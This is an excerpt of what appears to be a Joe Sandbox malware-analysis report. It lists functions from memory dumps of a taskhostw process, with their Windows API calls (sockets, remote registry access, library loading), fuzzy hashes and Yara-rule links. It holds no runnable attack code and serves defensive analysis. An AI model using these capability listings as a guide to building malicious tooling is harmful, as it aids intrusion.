Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 436317c9aceebbdf16960bd9a62aceb352af0c57fb4eca1740e92f0cb471f171
Instruction ID: c4bf6841c362f75df2c4838f4f49dd80f91ed610f28e2a9000bcb6efd0d39d8c
Opcode Fuzzy Hash: 436317c9aceebbdf16960bd9a62aceb352af0c57fb4eca1740e92f0cb471f171
Instruction Fuzzy Hash: 3F412C31604BC09BC7399B399D8CBEFBB95BB45300F25C81DE047879A0C774A88AD751

Function 00236205 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 0023621D
GetDC.USER32(00000000), ref: 00236225
GetDeviceCaps.GDI32(00000000,0000005A,?,?,0023905C,?,?,000000FF,00000000,?,000000FF,?,00000001,?), ref: 00236230
ReleaseDC.USER32(00000000,00000000), ref: 0023623C
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00236278
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00236289
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 002362C3
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 002362E3

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 6e13ace78bde3842dc35e1df3113fe7909999673414ecf08529133e887876a64
Instruction ID: a642f72bf3dd2e2b8c2700cfaf0e0f26a48c9e7d7dc03b61bf8cf103f934dd81
Opcode Fuzzy Hash: 6e13ace78bde3842dc35e1df3113fe7909999673414ecf08529133e887876a64
Instruction Fuzzy Hash: 04319C72610210BFEB118F54ED8AFEB3BADEF09721F044065FE089A291C7759C51CBA4

Function 02AAB271 Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 02AAB286
_memcmp.LIBCMT ref: 02AAB2A8
_memcmp.LIBCMT ref: 02AAB2C0
_memcmp.LIBCMT ref: 02AAB2D3
_memcmp.LIBCMT ref: 02AAB2ED
_memcmp.LIBCMT ref: 02AAB300
_memcmp.LIBCMT ref: 02AAB318
_memcmp.LIBCMT ref: 02AAB333

Memory Dump Source

Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true

Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 15f0f6386b2101db337efd48204956996102700c164b9a85bc4e5a5f22c31147
Instruction ID: 531e550e012b52d64a9649e2d4292a6289066ae90f8170956d49ef61a68434ab
Opcode Fuzzy Hash: 15f0f6386b2101db337efd48204956996102700c164b9a85bc4e5a5f22c31147
Instruction Fuzzy Hash: 9B218EF16802097FAA04A6219EA1F7F776DAE2034CF040426FD0997641FFA5EE15C6B9

Function 0021EBAF Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON

Download Yara Rule

APIs

Part of subcall function 001B9997: __itow.LIBCMT ref: 001B99C2
Part of subcall function 001B9997: __swprintf.LIBCMT ref: 001B9A0C

Part of subcall function 001CFE06: _wcscpy.LIBCMT ref: 001CFE29

_wcstok.LIBCMT ref: 0021ED20
_wcscpy.LIBCMT ref: 0021EDAF
_memset.LIBCMT ref: 0021EDE2

Strings

X, xrefs: 0021EE1F

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X
API String ID: 774024439-3081909835
Opcode ID: 08c4a1010a83b174a9169049f8616af7e5013ddfb4e1799bb33c1c3a99659818
Instruction ID: 23c0acd6d2c01a69c6c8da838f1677bf95ea543c836e19f2681ed580bf138709
Opcode Fuzzy Hash: 08c4a1010a83b174a9169049f8616af7e5013ddfb4e1799bb33c1c3a99659818
Instruction Fuzzy Hash: D1C1A2315183019FCB24EF24C881A9EB7E5FFA5310F11492DF899972A2DB30ED55CB82

Function 02ABBBE8 Relevance: 10.8, APIs: 7, Instructions: 280COMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 02ABBD1C
__swprintf.LIBCMT ref: 02ABBD5F

Part of subcall function 02A57341: _memmove.LIBCMT ref: 02A57382

__swprintf.LIBCMT ref: 02ABBDB3

Part of subcall function 02A72C18: __woutput_l.LIBCMT ref: 02A72C71

__swprintf.LIBCMT ref: 02ABBE01

Part of subcall function 02A72C18: __flsbuf.LIBCMT ref: 02A72C93
Part of subcall function 02A72C18: __flsbuf.LIBCMT ref: 02A72CAB

__swprintf.LIBCMT ref: 02ABBE50
__swprintf.LIBCMT ref: 02ABBE9F
__swprintf.LIBCMT ref: 02ABBEEE

Memory Dump Source

Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true

Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd

Similarity

API ID: __swprintf$__flsbuf$__woutput_l_memmove
String ID:
API String ID: 1085135966-0
Opcode ID: e0c50845bf7fce6c681f2f3d95343b021b16bc13d9f9b35811af3bc83757c636
Instruction ID: bbd52894c26e8c278622950fa7659be3ea4f83686351cacb55bc17daaa6d046a
Opcode Fuzzy Hash: e0c50845bf7fce6c681f2f3d95343b021b16bc13d9f9b35811af3bc83757c636
Instruction Fuzzy Hash: 2DA11CB1448314AFC754EB64DE85DAFB7EDAF98704F404929F98682190EF34D948CF62

Function 00226C19 Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00226D16
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00226D37
WSAGetLastError.WSOCK32(00000000), ref: 00226D4A
htons.WSOCK32(?,?,?,00000000,?), ref: 00226E00
inet_ntoa.WSOCK32(?), ref: 00226DBD

Part of subcall function 0020ABF4: _strlen.LIBCMT ref: 0020ABFE
Part of subcall function 0020ABF4: _memmove.LIBCMT ref: 0020AC20

_strlen.LIBCMT ref: 00226E5A
_memmove.LIBCMT ref: 00226EC3

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
String ID:
API String ID: 3619996494-0
Opcode ID: af024f8600642d1cda867918c5febed43aba8ac779bbb4d4245b147dc3bf23bb
Instruction ID: d9d5bce08935e201c51c8b35b53a81943c55d8b6c4d65b8d7b19069c4d864aaf
Opcode Fuzzy Hash: af024f8600642d1cda867918c5febed43aba8ac779bbb4d4245b147dc3bf23bb
Instruction Fuzzy Hash: 2281FB32514310ABC710EF64EC8AFAFB7E9EB94714F104919F5559B2A2DB70ED01CB92

Function 02AAA596 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 249COMMON

Download Yara Rule

APIs

_wcscmp.LIBCMT ref: 02AAA5EB
_wcscmp.LIBCMT ref: 02AAA64E
_wcsstr.LIBCMT ref: 02AAA65F
_wcscmp.LIBCMT ref: 02AAA6A7
_wcscmp.LIBCMT ref: 02AAA727

Strings

@, xrefs: 02AAA5BB

Memory Dump Source

Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true

Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd

Similarity

API ID: _wcscmp$_wcsstr
String ID: @
API String ID: 3312506106-2766056989
Opcode ID: db69b5071b4f03b89492a660c4e426a08a7858e4c390d033fde3beadfa727160
Instruction ID: 8688b184422a4844200c144f112fe2d7a49f3c79dbfa3d2f0c87a47315ef30f4
Opcode Fuzzy Hash: db69b5071b4f03b89492a660c4e426a08a7858e4c390d033fde3beadfa727160
Instruction Fuzzy Hash: EE8190310042069BEB15DF14C9E4FAA7BF9EF44318F04856AED859B096DF34D94ACBA1

Function 002362FF Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 0023631E
GetWindowLongW.USER32(009025E8,000000F0), ref: 00236351
GetWindowLongW.USER32(009025E8,000000F0), ref: 00236386
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 002363B8
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 002363E2
GetWindowLongW.USER32(00000000,000000F0), ref: 002363F3
SetWindowLongW.USER32(00000000,000000F0,00000000,?,?,?,00239E6E,?,?,?,?), ref: 0023640D

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: 94553352fc84efcef92f4cce72c1d0c2c5c9d6e2bbd0a490a7f0fd51a8ecf1e3
Instruction ID: 45c2f179d10c636eeb4686063b78281d0edddb6ec711180747b06411ceabd714
Opcode Fuzzy Hash: 94553352fc84efcef92f4cce72c1d0c2c5c9d6e2bbd0a490a7f0fd51a8ecf1e3
Instruction Fuzzy Hash: 6331F570A14251AFDB21CF18ED89F5537E9FB4AB10F1981A4F5148F2B2CB61AC909F51

Function 00226289 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00227EA0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00227ECB

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 002262DC
WSAGetLastError.WSOCK32(00000000), ref: 002262EB
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00226324
connect.WSOCK32(00000000,?,00000010), ref: 0022632D
WSAGetLastError.WSOCK32 ref: 00226337
closesocket.WSOCK32(00000000), ref: 00226360
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00226379

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
String ID:
API String ID: 910771015-0
Opcode ID: 838e501f50881252da190a59c9614b5092a28a726f571e3b24b85b4648fe6247
Instruction ID: 9457127d0890b8a9133124c766345784fbc47325b23c16fd6d16775c38f5c2ac
Opcode Fuzzy Hash: 838e501f50881252da190a59c9614b5092a28a726f571e3b24b85b4648fe6247
Instruction Fuzzy Hash: 5331C432610129BFDB10DFA4ED89BBE7BA9EB44720F044169FD0597291DB74AC148BA1

Function 001D4109 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,001D41D2,?), ref: 001D4123
GetProcAddress.KERNEL32(00000000), ref: 001D412A
EncodePointer.KERNEL32(00000000), ref: 001D4136
DecodePointer.KERNEL32(00000001,001D41D2,?), ref: 001D4153

Strings

combase.dll, xrefs: 001D411E
RoInitialize, xrefs: 001D4112

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoInitialize$combase.dll
API String ID: 3489934621-340411864
Opcode ID: e91da8dc369c6596a6e25092e527707ab6b011950daa4ec88c7a0528de230db6
Instruction ID: a17936cf7e070cd1479a06cdd54c1aa5e4dc6dcbcd9bfea3705e2762221c391d
Opcode Fuzzy Hash: e91da8dc369c6596a6e25092e527707ab6b011950daa4ec88c7a0528de230db6
Instruction Fuzzy Hash: 3EE01A70BA0340EFEB509B72FD4DB043BA4A756B02F908464B449D61A0CBB59184EF00

Function 001D41DE Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,001D40F8), ref: 001D41F8
GetProcAddress.KERNEL32(00000000), ref: 001D41FF
EncodePointer.KERNEL32(00000000), ref: 001D420A
DecodePointer.KERNEL32(001D40F8), ref: 001D4225

Strings

RoUninitialize, xrefs: 001D41E7
combase.dll, xrefs: 001D41F3

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 3489934621-2819208100
Opcode ID: b7704a3ab39d7e18ec4309a66070dcddf65abe5455ef3c3882e4fa1e6960aafb
Instruction ID: 8952f06d75fd70b82846122b20f6e5ff8c268afd407aa2c6823e603d41828ad5
Opcode Fuzzy Hash: b7704a3ab39d7e18ec4309a66070dcddf65abe5455ef3c3882e4fa1e6960aafb
Instruction Fuzzy Hash: 47E0B670AD1300EBEB50DB71FE4DB053BE4B704743F904075F119E11A0CBB68644EA11

Function 02AB5961 Relevance: 9.2, APIs: 6, Instructions: 205COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 02AB5AB4
_memmove.LIBCMT ref: 02AB59EF

Part of subcall function 02A58D97: __itow.LIBCMT ref: 02A58DC2
Part of subcall function 02A58D97: __swprintf.LIBCMT ref: 02A58E0C

_memmove.LIBCMT ref: 02AB5A62
_memmove.LIBCMT ref: 02AB5B49
_memmove.LIBCMT ref: 02AB5B62
_memmove.LIBCMT ref: 02AB5B7E

Memory Dump Source

Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true

Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd

Similarity

API ID: _memmove$__itow__swprintf
String ID:
API String ID: 3253778849-0
Opcode ID: 83bfb1693cc3b69e8bd11e3b96494f3007bffb072c759ef512c500f0d887bf46
Instruction ID: d2a9c76e076322e70bd6b4e5552d2d016994a9c376560953e44f733b3c7a89be
Opcode Fuzzy Hash: 83bfb1693cc3b69e8bd11e3b96494f3007bffb072c759ef512c500f0d887bf46
Instruction Fuzzy Hash: 39619B7194026AAFCB12EF60CD80EFF37AAAF05308F444559ED566B292EF34A945CF50

Function 00216561 Relevance: 9.2, APIs: 6, Instructions: 205COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 002166B4
_memmove.LIBCMT ref: 002165EF

Part of subcall function 001B9997: __itow.LIBCMT ref: 001B99C2
Part of subcall function 001B9997: __swprintf.LIBCMT ref: 001B9A0C

_memmove.LIBCMT ref: 00216662
_memmove.LIBCMT ref: 00216749
_memmove.LIBCMT ref: 00216762
_memmove.LIBCMT ref: 0021677E

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: _memmove$__itow__swprintf
String ID:
API String ID: 3253778849-0
Opcode ID: 747d5336aec051d9d4647c1544dfa5bf5c665d96edbc8748b4b8b21033730896
Instruction ID: 46ffd9cf03b7bd5d0a94b3b0d1268235397ab27f0761c0be15c078a588211ab8
Opcode Fuzzy Hash: 747d5336aec051d9d4647c1544dfa5bf5c665d96edbc8748b4b8b21033730896
Instruction Fuzzy Hash: 4061AD3051065A9BCF12EF20CC86FFE77A9AF68308F044559F9555B2D2DB34AD62CB90

Function 02AB4168 Relevance: 9.2, APIs: 6, Instructions: 170COMMON

Download Yara Rule

APIs

_wcscmp.LIBCMT ref: 02AB4201

Memory Dump Source

Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true

Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd

Similarity

API ID: _wcscmp
String ID:
API String ID: 856254489-0
Opcode ID: 33cd0ae8853705823ff7dd7a1eda622cdde04badbdf09edc531c5b295a380b95
Instruction ID: 0d15adc76e4e5ba6036eccd9830ffae4cd531649a012aceb0f41c1a98a8e71d3
Opcode Fuzzy Hash: 33cd0ae8853705823ff7dd7a1eda622cdde04badbdf09edc531c5b295a380b95
Instruction Fuzzy Hash: 525177B24483849BC725DB94DD909DFB3EDAF89310F00496EE589D3152EF35A18CCB66

Function 0023026F Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 001B7F41: _memmove.LIBCMT ref: 001B7F82

Part of subcall function 00230EA5: CharUpperBuffW.USER32(?,?), ref: 00230EBC

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00230348
RegOpenKeyExW.ADVAPI32 ref: 00230388
RegCloseKey.ADVAPI32(?), ref: 002303AB
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 002303D4
RegCloseKey.ADVAPI32(?), ref: 00230417
RegCloseKey.ADVAPI32(00000000), ref: 00230424

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
String ID:
API String ID: 4046560759-0
Opcode ID: 3c4eb40b3a48c0365f1996948527f1b54440c6afd48460b9a29cc9bbb972e099
Instruction ID: 7aa4da51d237d518564355e7d82c04cac6b15b609dba0cade2bda46d3df2bc39
Opcode Fuzzy Hash: 3c4eb40b3a48c0365f1996948527f1b54440c6afd48460b9a29cc9bbb972e099
Instruction Fuzzy Hash: D2517971228200AFC714EF64D895EAFBBE9FF88314F04491DF585872A2DB71E915CB62

Function 02A58D97 Relevance: 9.1, APIs: 6, Instructions: 146COMMON

Download Yara Rule

APIs

__itow.LIBCMT ref: 02A58DC2
__swprintf.LIBCMT ref: 02A58E0C
__i64tow.LIBCMT ref: 02A8ED3F

Memory Dump Source

Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true

Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd

Similarity

API ID: __i64tow__itow__swprintf
String ID:
API String ID: 421087845-0
Opcode ID: 39ac969a5d36b17aba07e8c64723978f0bb42c4465549b3cb08dc9d925fed958
Instruction ID: 18de5fd66eb489b84d22a8954e7185328a39d134e0073544f01e2d23c2522396
Opcode Fuzzy Hash: 39ac969a5d36b17aba07e8c64723978f0bb42c4465549b3cb08dc9d925fed958
Instruction Fuzzy Hash: 0541E672944315DFEB24AB34DE81A77B7F9EF04304F2044AEE949D6281EF359841CB54

Function 02AB4AA4 Relevance: 9.1, APIs: 6, Instructions: 138COMMON

Download Yara Rule

APIs

_wcsncpy.LIBCMT ref: 02AB4AE6
_wcsncpy.LIBCMT ref: 02AB4B18
_wcsncpy.LIBCMT ref: 02AB4B4B
_wcsncpy.LIBCMT ref: 02AB4B8D
_wcsncpy.LIBCMT ref: 02AB4BC7
_wcsncpy.LIBCMT ref: 02AB4BF6

Memory Dump Source

Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true

Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd

Similarity

API ID: _wcsncpy
String ID:
API String ID: 1735881322-0
Opcode ID: bff410fd89d59ec60ffbbd26d3f957a73104d33eefce5dacdf7aeb7e05c75cea
Instruction ID: 32aef46fc04d7596d97b68b15d83637acc89392969b5ebb3fb03c36f6f41d59f
Opcode Fuzzy Hash: bff410fd89d59ec60ffbbd26d3f957a73104d33eefce5dacdf7aeb7e05c75cea
Instruction Fuzzy Hash: 7E41A579C5021475CB11EBB58C45ADFB3ADAF49310F118866DA08E3222EF34A645C7ED

Function 00212502 Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00212550
GetMenuItemInfoW.USER32 ref: 0021259B
IsMenu.USER32(00000000), ref: 002125BB
CreatePopupMenu.USER32 ref: 002125EF
GetMenuItemCount.USER32(000000FF), ref: 0021264D
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 0021267E

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: e67338087040c36746676944958ea14e98ba3ecd95b8228509a92b2bde8c8057
Instruction ID: 6cadc35bdb13f23ca9900ffe7237a0636f46bf40956d19d2b86dafbd691425f8
Opcode Fuzzy Hash: e67338087040c36746676944958ea14e98ba3ecd95b8228509a92b2bde8c8057
Instruction Fuzzy Hash: A6519170910286EFCF24CF64E988AEEBBF9AF64314F144159F815A72D0D77099B8CB51

Function 00208B3B Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 002083D1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 002083E8
Part of subcall function 002083D1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 002083F2
Part of subcall function 002083D1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00208401
Part of subcall function 002083D1: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00208408
Part of subcall function 002083D1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0020841E

GetLengthSid.ADVAPI32(?,00000000,00208757), ref: 00208B8C
